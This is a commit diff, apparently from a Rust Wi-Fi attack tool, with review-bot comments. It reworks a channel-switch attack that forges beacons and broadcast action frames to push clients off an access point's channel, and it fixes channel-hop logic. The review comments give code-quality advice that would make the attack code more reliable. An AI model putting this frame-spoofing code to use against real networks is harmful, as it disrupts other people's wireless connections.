
Commit 4df32a0

committed
Fix channel locking skipping first channel after hop; fixed CSA to make more sense on the wire.
1 parent 437ee16 commit 4df32a0


3 files changed

+22
-26
lines changed


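--- a/src/attack.rs
+++ b/src/attack.rs
@@ -36,7 +36,7 @@ use crate::{
 // //
 //////////////////////////////////////////////////////////////
 
-pub fn csa_attack(oxide: &mut OxideRuntime, mut beacon: Beacon) -> Result<(), String> {
+pub fn csa_attack(oxide: &mut OxideRuntime, beacon: Beacon) -> Result<(), String> {
 if oxide.config.disable_csa {
 return Ok(());
 }
@@ -74,48 +74,44 @@ pub fn csa_attack(oxide: &mut OxideRuntime, mut beacon: Beacon) -> Result<(), St
 
 // If we are transmitting
 if !oxide.config.notx {
-let random_client = ap_data
-.client_list
-.get_random()
-.map(|client| client.mac_address);
-
-// Send a CSA action frame to a random client
-if let Some(client) = random_client {
-let frx = build_csa_action(&client, &ap_data.mac_address, new_channel);
+// Send 5 beacons with decreasing counts
+for count in (0..6).rev() {
+let frx = build_csa_beacon(beacon.clone(), new_channel.into(), count);
 let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
 oxide.status_log.add_message(StatusMessage::new(
 MessageType::Info,
 format!(
-"CSA Attack (Action): {} => {} ({}) Channel: {}",
+"CSA Attack (Beacon): {} ({}) Channel: {} | Count: {}",
 ap_mac,
-client,
 beacon
 .station_info
 .ssid
 .clone()
 .unwrap_or("Hidden".to_string()),
-new_channel
+new_channel,
+count
 ),
 ));
 }
 
-// Send beacons too
-for _ in 0..10 {
-let frx = build_csa_beacon(beacon.clone(), new_channel.into());
-let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
-}
+let client = MacAddress::broadcast();
 
-ap_data.interactions += 1;
-ap_data.auth_sequence.state = 1;
+// Send a CSA action frame to broadcast
+let frx = build_csa_action(&client, &ap_data.mac_address, new_channel);
+let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
 oxide.status_log.add_message(StatusMessage::new(
 MessageType::Info,
 format!(
-"CSA Attack (Beacon*10): {} ({}) Channel: {}",
+"CSA Attack (Action): {} => {} ({}) Channel: {}",
 ap_mac,
+client,
 beacon.station_info.ssid.unwrap_or("Hidden".to_string()),
 new_channel
 ),
 ));
+
+ap_data.interactions += 1;
+ap_data.auth_sequence.state = 1;
 }
 
 Ok(())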
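Review bot: The comment `// Send 5 beacons with decreasing counts` on new line 77 does not match the loop under it: `(0..6).rev()` yields six values, 5 down to 0, so six frames are written and six log entries are added. Either the comment or the range should change so that the source and the status log agree on what was transmitted. Both transmit paths (new lines 80 and 101) also drop the result of `write_packet` with `let _ =` and then add the `StatusMessage` unconditionally, so the log records a transmission even when the write failed; if `write_packet` returns a `Result`, as the `let _ =` suggests, checking it before logging would keep the record accurate. The body of `csa_attack` runs past the end of the second hunk.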

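--- a/src/main.rs
+++ b/src/main.rs
@@ -2857,7 +2857,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
 channels_binding
 .clone_from(&oxide.if_hardware.hop_channels);
 cycle_iter = channels_binding.iter().cycle();
-first_channel = *cycle_iter.next().unwrap();
+first_channel = *cycle_iter.clone().next().unwrap();
 oxide.if_hardware.locked = !oxide.if_hardware.locked;
 } else {
 // Get target_chans
@@ -2873,7 +2873,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
 channels_binding
 .clone_from(&oxide.if_hardware.hop_channels);
 cycle_iter = channels_binding.iter().cycle();
-first_channel = *cycle_iter.next().unwrap();
+first_channel = *cycle_iter.clone().next().unwrap();
 
 oxide.status_log.add_message(StatusMessage::new(
 MessageType::Info,
@@ -2901,7 +2901,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
 channels_binding
 .clone_from(&oxide.if_hardware.hop_channels);
 cycle_iter = channels_binding.iter().cycle();
-first_channel = *cycle_iter.next().unwrap();
+first_channel = *cycle_iter.clone().next().unwrap();
 
 oxide.status_log.add_message(StatusMessage::new(
 MessageType::Info,
@@ -2929,7 +2929,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
 channels_binding
 .clone_from(&oxide.if_hardware.hop_channels);
 cycle_iter = channels_binding.iter().cycle();
-first_channel = *cycle_iter.next().unwrap();
+first_channel = *cycle_iter.clone().next().unwrap();
 
 oxide.status_log.add_message(StatusMessage::new(
 MessageType::Info,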
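Review bot: The `unwrap()` on `cycle_iter.clone().next()` panics when `oxide.if_hardware.hop_channels` is empty, because cycling an empty iterator yields `None`; the same line is repeated in all four hunks of this file (new lines 2860, 2876, 2904 and 2932). Whether an empty hop list can reach these branches is not visible here, so either state the invariant with `expect("hop_channels must not be empty")` or handle `None` and return an error, which `main` already supports through its `Result` return type. Cloning the iterator only to peek at its first item also hides the intent, and a comment such as `// peek without advancing, so the next hop still starts at the first channel` on each site would explain why the clone is there. The enclosing branches start and end outside the hunks.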

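--- a/src/tx.rs
+++ b/src/tx.rs
@@ -722,15 +722,15 @@ pub fn build_probe_response(
 rth
 }
 
-pub fn build_csa_beacon(beacon: Beacon, new_channel: u32) -> Vec<u8> {
+pub fn build_csa_beacon(beacon: Beacon, new_channel: u32, count: u8) -> Vec<u8> {
 let mut rth: Vec<u8> = RTH_NO_ACK.to_vec();
 
 let mut frx = beacon.clone();
 frx.header.sequence_control.sequence_number =
 beacon.header.sequence_control.sequence_number + 1;
 frx.station_info
 .data
-.push((37u8, vec![0u8, new_channel.try_into().unwrap(), 3u8]));
+.push((37u8, vec![0u8, new_channel.try_into().unwrap(), count]));
 
 rth.extend(frx.encode());
 rth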
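Review bot: `build_csa_beacon` is a public function whose new `count` parameter is undocumented, and the element it appends on new line 733 is built from bare literals (`37u8`, `0u8`). A doc comment should say that the function appends element ID 37 (Channel Switch Announcement) with three bytes, a mode of 0, the new channel and `count`, and should carry a `# Panics` section for the `new_channel.try_into().unwrap()`, which panics when the `u32` does not fit in a `u8`. Since the signature changes in this commit anyway, declaring `new_channel: u8` would move that failure to the callers at compile time; the one call site visible in `src/attack.rs` passes `new_channel.into()`, so the value there presumably already fits. The closing brace of the function is outside the hunk.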
